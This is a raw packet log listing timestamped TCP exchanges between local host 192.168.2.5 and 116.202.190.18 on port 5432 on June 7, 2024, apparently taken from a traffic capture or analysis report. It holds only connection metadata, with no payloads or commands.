Jun 7, 2024 17:21:17.168154001 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.168168068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.168247938 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.168654919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.168761015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.168777943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.168837070 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.168868065 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.168896914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.168936014 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.168958902 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.169409990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.169461966 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.169480085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.169492960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.169527054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.169538021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.169538021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.169574976 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.170166969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.170196056 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.170229912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.170234919 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.170248032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.170267105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.170279980 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.170341015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.170871019 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.170903921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.170938969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.170939922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.170988083 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.170988083 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.171655893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.171684980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.171719074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.171730995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.171730995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.171752930 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.171783924 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.171849966 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.172295094 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.172324896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.172357082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.172358036 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.172390938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.172409058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.172409058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.172451973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.173257113 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.173285961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.173320055 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.173335075 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.173335075 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.173355103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.173374891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.173449993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.173949003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.174055099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.174088001 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.174105883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.174105883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.174129963 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.174458027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.174511909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.174530983 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.174545050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.174582958 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.174582958 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.175611019 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.175640106 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.175663948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.175690889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.175698042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.175724983 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.175759077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.175765991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.175765991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.175843000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.176218987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.176248074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.176276922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.176300049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.176328897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.176333904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.176356077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.176430941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.176971912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.177000999 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.177030087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.177035093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.177068949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.177077055 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.177077055 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.177144051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.177620888 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.177649975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.177680969 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.177681923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.177716017 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.177731037 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.177731991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.177764893 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.178323030 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.178356886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.178390980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.178405046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.178405046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.178459883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.179018974 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.179053068 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.179086924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.179100990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.179100990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.179186106 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.179712057 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.179744959 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.179769039 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.179778099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.179806948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.180052996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.180258036 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.180291891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.180325985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.180332899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.180332899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.180373907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.181124926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.181180954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.181188107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.181210995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.181245089 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.181260109 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.181260109 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.181466103 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.181766033 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.181799889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.181849003 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.181871891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.181894064 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.181968927 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.182215929 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.182270050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.182305098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.182327032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.182327032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.182538986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.182976007 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.183011055 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.183042049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.183046103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.183062077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.183135986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.183644056 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.183672905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.183706045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.183706999 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.183739901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.183742046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.183787107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.183787107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.184329987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.184362888 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.184390068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.184396029 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.184407949 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.184462070 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.185313940 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.185347080 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.185374022 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.185380936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.185422897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.185422897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.185575008 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.185628891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.185630083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.185663939 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.185714960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.185714960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.186403036 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.186438084 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.186471939 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.186495066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.186495066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.186522961 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.186878920 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.186932087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.186945915 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.186963081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.186975956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.186996937 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.187016964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.187144041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.187614918 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.187644958 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.187675953 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.187695026 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.187696934 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.187730074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.187763929 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.187781096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.187781096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.187855959 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.188590050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.188621044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.188669920 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.188669920 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.188672066 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.188708067 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.188740969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.188756943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.188756943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.189028978 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.191746950 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.191797972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.191808939 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.191833973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.191860914 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.191869020 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.191905975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.191917896 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.191917896 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.191962957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.192034960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.192090034 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.192198992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.192255020 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.192297935 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.192331076 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.192361116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.192384958 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.192436934 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.192452908 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.193411112 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.193490028 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.193527937 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.193579912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.193614960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.193627119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.193627119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.193650007 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.193698883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.193698883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.194428921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.194463968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.194499016 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.194511890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.194511890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.194535017 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.194554090 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.194570065 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.194602966 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.194627047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.194627047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.194641113 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.194653988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.194669962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.194698095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.194715023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.195250034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.195302963 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.195308924 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.195338011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.195370913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.195385933 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.195385933 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.195405006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.195427895 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.195533991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.196564913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.196594954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.196638107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.196645021 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.196680069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.196707010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.196707010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.196713924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.196759939 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.196793079 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.197117090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.197186947 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.197201014 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.197236061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.197290897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.197290897 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.197354078 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.197387934 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.197412014 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.197443962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.197966099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.198019981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.198052883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.198108912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.198143005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.198165894 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.198165894 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.198175907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.198196888 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.198239088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.198869944 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.198899984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.198945999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.198945999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.198952913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.198987961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.199019909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.199024916 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.199043989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.199076891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.200109005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200160980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200191021 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200217962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.200217962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.200253010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200287104 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200310946 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.200310946 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.200371981 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.200642109 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200670958 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200720072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.200720072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.200723886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200757980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.200792074 CEST	5432	49716	116.202.190.18	192.168.2.5
